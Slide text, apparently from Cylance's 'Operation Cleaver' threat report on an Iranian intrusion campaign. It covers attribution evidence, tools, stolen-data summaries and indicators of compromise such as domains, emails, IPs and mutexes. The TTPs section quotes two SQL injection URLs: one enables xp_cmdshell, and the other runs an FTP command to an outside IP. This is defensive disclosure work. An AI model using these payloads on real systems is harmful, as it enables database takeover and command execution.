Operation CleaverIran is the next China

Numerous references inside the namespaces of their custom bot code codenamed TinyZbot e.g.:

e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb

PDBs associated with the hacker name “Jimbp” e.g.:

c:\users\jimbp\desktop\binder_1 - for cleaver\binder_1\obj\x86\release\setup.pdb

PDBs associated with the keystroke loggers, artifacts, and numerous other tools, e.g.:

e:\Projects\Cleaver\trunk\MainModule\obj\Release\MainModule.pdb

Why “Cleaver”?The name…

Targeting of Critical infrastructure globally.

Shocking Level of access.Network. Systems.

Applications. Databases. DNS. Paypal. GoDaddy.

Basically Everything.

Why Now?Exposing Cleaver…

• Prior to 2010, Iran as a target was almost non-existent and as the attacker mentioned only in terms of website defacement

• In 2010, Stuxnet was realized, severely impacting Iran’s Nuclear program

• Retaliation began…• Cleaver is an Iranian born campaign

dating to 2012, with some data from 2007.

• Since Shamoon, we have witnessed an evolution of skillset and threat actor

IRAN CYBER ATTACKSExposing Cleaver…

SourcingIranian

GeoIP Location: IranNet block: 78.109.194.96 - 78.109.194.127Owner: Tarh AndishanEmail: tarh.andishan(at)yahoo.comPhone: +98-21-22496658NIC-Handle: TAR1973-RIPE

Tarh Andishan – meaning “Innovators”, “Inventors”

78.109.194.96/27 – Current – Afranet, Iran217.11.17.96/28 - 10/22/2014 – Afranet, Iran81.90.144.104/29 - 10/5/2014 – Afranet, Middle East Oil, Iran31.47.35.0/24 – 11/2012 – Afranet, Iran

The logger module binary’s file description value is the following:

ye file khube DG. ba in ham kari nadashte bashin

Roughly translated from Persian, this text says:DG is a good file, don’t bother with this

Starting Nmap 6.25 at 2012-08-17 09:18 Iran Daylight Time

Netafraz.com infrastructure in Iran

Persian hacker names: Salman Ghazikhani, Bahman Mohebbi, Kaj, Parviz, Alireza, etc.

IranRedline.org

In one of IranRedLine.org’s blog posts, the author speculates on Tarh Andishan’s involvementwith the Iranian government by showing close proximity to SPND, the Organization of DefensiveInnovation and Research

SourcingTarh Andishan

TTPsSQL Injection

http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@b1=%20show advanced options;declare%20@b2%20varchar(8000);set%20@b2=%20xp_cmdshell;%20EXEC%20master.dbo.sp_configure%20@b1,%201;RECONFIGURE;EXEC%20master.dbo.sp_configure%20@b2,%201;RECONFIGURE;--%20

http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@b1=%20ftp -A 108.175.152.230;%20exec%20master..xp_cmdshell%20@b1--%2

TTPsSpearphishing: fake resume tool

TTPsSpearphishing: Resume Submitter

Escalation and PivotingTools and Toys…

Public: Netcat, Cain & Abel, psexec, Mimikatz, WCE, Putty, Plink, nmap, xcmd, etc.

Custom: TinyZbot, NetC, ASPX webshells, SYN flooder, ARP poisoning, Csext, etc.

Exploits: MS08-067 (Conficker) and MS10-015 (KiTrap0D)

• Signing encryption keys for major airline company• Usernames and passwords from dozens of companies• 250k Windows credentials at a single Oil company• Airport and Airline crew credentials• Airport network configuration files• SNMP credentials for major Energy Companies• Student information targeting

Access and ExfilThe damage…

Indicators of Compromise (IOCs)Let’s go hunting… or preferably PREVENTING!

Domainsdoosan-job(dot)comdownloadsservers(dot)comdrivercenterupdate(dot)comeasyresumecreatorpro(dot)comgoogleproductupdate(dot)comgoogleproductupdate(dot)netkundenpflege.menrad(dot)demicrosoftactiveservices(dot)commicrosoftmiddleast(dot)commicrosoftonlineupdates(dot)commicrosoftserverupdate(dot)commicrosoftupdateserver(dot)netmicrosoftwindowsresources(dot)commicrosoftwindowsupdate(dot)netnorthropgrumman(dot)netteledyne-jobs(dot)comwindowscentralupdate(dot)comwindowssecurityupdate(dot)comwindowsserverupdate(dot)comwindowsupdateserver(dot)comwww.gesunddurchsjahr(dot)de

Emails for Domain Registrationdavejsmith200(at)outlook.comsalman.ghazikhani(at)outlook.combtr.8624(at)yahoo.comghanbarianco(at)gmail.comazlinux73(at)gmail.comdomain(at)netafraz.comtarh.andishan(at)yahoo.comahmadi(at)odeconline.comkafe0(at)yahoo.comdg_co(at)yahoo.comzahiry_alireza(at)yahoo.comzahiry.alireza(at)gmail.com

Emails used for Exfiltrationtestmail_00001(at)yahoo.comTerafficAnalyzer(at)yahoo.comdyanachear(at)beyondsys.com

50.23.164.16164.120.128.15464.120.208.7464.120.208.7564.120.208.7664.120.208.7864.120.208.15466.96.252.19878.109.194.11480.243.182.14987.98.167.7187.98.167.8587.98.167.14188.150.214.16288.150.214.16688.150.214.16888.150.214.170

95.211.191.22595.211.191.24795.211.241.24995.211.241.251108.175.152.230108.175.153.158159.253.144.209173.192.144.68174.36.195.158184.82.158.18184.82.181.48188.227.180.213192.111.145.197203.150.224.249207.182.142.68212.87.154.12212.87.154.14

MutexesZSC1

Adobe Report ServiceBmgr

Dynamic MutexesdemdaramdidamILoveThisMutex

Installed Services NamesCOM+ System ExtentionsCOM__System_Extentions

Network Connectivity ManagerService1

MsNetMonitorPcapins

scManagerSvcCredentialSync

Adobe Report Service

IP Addresses

Resources• “Operation Cleaver” Report• Cylance Blog• Twitter: @cylanceinc• Twitter: @hackingexposed• Email: opcleaver@Cylance.com for more

information• Yara rules on Cylance.com• Test Drive CylancePROTECT:

my.cylance.com